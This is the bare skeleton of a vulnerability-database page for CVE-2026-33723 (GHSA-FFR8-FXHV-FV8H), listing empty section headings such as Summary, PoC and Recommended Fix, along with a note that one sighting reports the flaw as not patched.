Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33723 (GCVE-0-2026-33723)

GHSA-FFR8-FXHV-FV8H

Summary

Details

PoC

Impact

Recommended Fix

FKIE_CVE-2026-33723

Tags

Sightings

Nomenclature